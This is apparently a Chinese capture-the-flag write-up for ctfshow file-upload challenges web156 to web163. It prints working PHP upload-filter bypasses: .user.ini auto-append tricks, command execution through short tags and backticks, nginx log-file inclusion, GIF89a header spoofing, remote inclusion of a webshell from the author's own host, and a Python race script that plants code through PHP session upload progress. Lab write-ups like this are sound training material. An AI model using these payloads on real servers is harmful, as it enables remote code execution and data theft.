[ctfshow]web入门——文件上传(web156-web163)
[ctfshow]web入门——文件上传(web156-web163)
[ctfshow]web入门——文件上传
- [ctfshow]web入门——文件上传(web156-web163)
- web156
-
- 上传.user.ini
- web157
- web158
- web159
- web160
-
- 上传.user.ini+日志包含
- web161
- web162
-
- way1:远程文件包含
- way2:session条件竞争包含
- web163
本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ˘ω˘ @)ノ!!
web156
上传.user.ini
上传口
![[ctfshow]web入门——文件上传(web156-web163)_第1张图片](http://img.e-com-net.com/image/info8/d39637a202ff440583059d9e823262b2.jpg)
试了试upload界面有一个默认文件,可以用上传.user.ini的方法
![[ctfshow]web入门——文件上传(web156-web163)_第2张图片](http://img.e-com-net.com/image/info8/4576275d3790439b8be4538cc854cbb4.jpg)
后台应该是屏蔽了很多字符串(php,eval,post等等),甚至连正常图片都传不上去
试了一下php短标签还可以用
先找一下flag在哪
![[ctfshow]web入门——文件上传(web156-web163)_第3张图片](http://img.e-com-net.com/image/info8/18da0718582a477492db6780337418d0.jpg)
然后读flag的内容
exec("cat ../flag* > 2.txt");?>
访问/upload/,然后再访问/upload/2.txt,看到flag
![[ctfshow]web入门——文件上传(web156-web163)_第4张图片](http://img.e-com-net.com/image/info8/2339c0b2fcd34a29b5043b9c01201ab2.jpg)
web157
payload同上题,屏蔽了;
exec("cat ../flag* > 2.txt")?>
![[ctfshow]web入门——文件上传(web156-web163)_第5张图片](http://img.e-com-net.com/image/info8/5c0678fa390f4be99a72398c9f192d06.jpg)
web158
payload同上题
exec("cat ../flag* > 2.txt")?>
![[ctfshow]web入门——文件上传(web156-web163)_第6张图片](http://img.e-com-net.com/image/info8/2a3a2066f24f4de2b5662994111cfc4b.jpg)
web159
payload同上,括号被屏蔽,用反引号执行命令
`cat ../flag* > 2.txt` ?>
![[ctfshow]web入门——文件上传(web156-web163)_第7张图片](http://img.e-com-net.com/image/info8/d6f37cd39bd1473094e56271c961b79e.jpg)
web160
上传.user.ini+日志包含
过滤了反引号和空格,没有办法上传危险的函数了
所以利用include文件包含传
注意log被过滤
include"/var/l"."og/nginx/access.lo"."g"?>
![[ctfshow]web入门——文件上传(web156-web163)_第8张图片](http://img.e-com-net.com/image/info8/b9831ecd29af48b785edb826fe57d4b3.jpg)
![[ctfshow]web入门——文件上传(web156-web163)_第9张图片](http://img.e-com-net.com/image/info8/100eeb4351d744268a7b1ebc93303e00.jpg)
web161
估计是检测文件头,加个GIF89a?
![[ctfshow]web入门——文件上传(web156-web163)_第10张图片](http://img.e-com-net.com/image/info8/bf9259667957482db6626d43dddee8d4.jpg)
然后同上一题用日志包含
include"/var/l"."og/nginx/access.lo"."g"?>
![[ctfshow]web入门——文件上传(web156-web163)_第11张图片](http://img.e-com-net.com/image/info8/da7cd1e49ec345f09290713d89aeb8bd.jpg)
web162
过滤了.,所以不能利用日志包含了,先正常上传.user.ini
![[ctfshow]web入门——文件上传(web156-web163)_第12张图片](http://img.e-com-net.com/image/info8/b2264f0ed2a54b30b9f06eb8743fe69a.jpg)
然后有两种方法
way1:远程文件包含
![[ctfshow]web入门——文件上传(web156-web163)_第13张图片](http://img.e-com-net.com/image/info8/cce44500eacc4084b2e025cc204d2660.jpg)
因为不能有.所以将IP转换为十进制,我的默认路由就是一句话木马
![[ctfshow]web入门——文件上传(web156-web163)_第14张图片](http://img.e-com-net.com/image/info8/82a58424667e4d34b0841b29b176eea2.jpg)
如果是包含远程服务器上的PHP文件,那么得到的是被远程服务器解析过的PHP,所以在写一句话木马的时候就不要做成.php的文件,一般包含.txt的文件
https://www.jianshu.com/p/be68cf9be911
![[ctfshow]web入门——文件上传(web156-web163)_第15张图片](http://img.e-com-net.com/image/info8/3fbb8507c8dd40869890521c5871f395.jpg)
way2:session条件竞争包含
利用session.upload_progress将木马写入session文件,然后包含这个session文件。
首先在.user.ini包含/tmp/sess_{sessid}
auto_append_file=/tmp/sess_xiao
![[ctfshow]web入门——文件上传(web156-web163)_第16张图片](http://img.e-com-net.com/image/info8/50860500dcf44283848fd25d88388acb.jpg)
import io
import sys
import requests
import threading
host = 'http://6038fed7-c4a1-4d83-98cc-45dba9f44a8d.challenge.ctf.show/'
sessid = 'xiaozS'
def POST(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
session.post(
host,
data={"PHP_SESSION_UPLOAD_PROGRESS":"');echo md5('1');?>"},
files={"file":('a.txt', f)},
cookies={'PHPSESSID':sessid}
)
def READ(session):
while True:
response = session.get(f'{host}/upload/')
# print(response.text)
if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:
print('[+++]retry')
else:
print(response.text)
sys.exit(0)
with requests.session() as session:
t1 = threading.Thread(target=POST, args=(session, ))
t1.daemon = True
t1.start()
READ(session)
呜呜呜条件竞争了好久没成功,不知道为什么
web163
同上用远程文件包含
GIF89a?
auto_append_file=http://6024326456
![[ctfshow]web入门——文件上传(web156-web163)_第17张图片](http://img.e-com-net.com/image/info8/f77b65945e2a41f09b8dd14cbd93a5ea.jpg)
本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ˘ω˘ @)ノ!!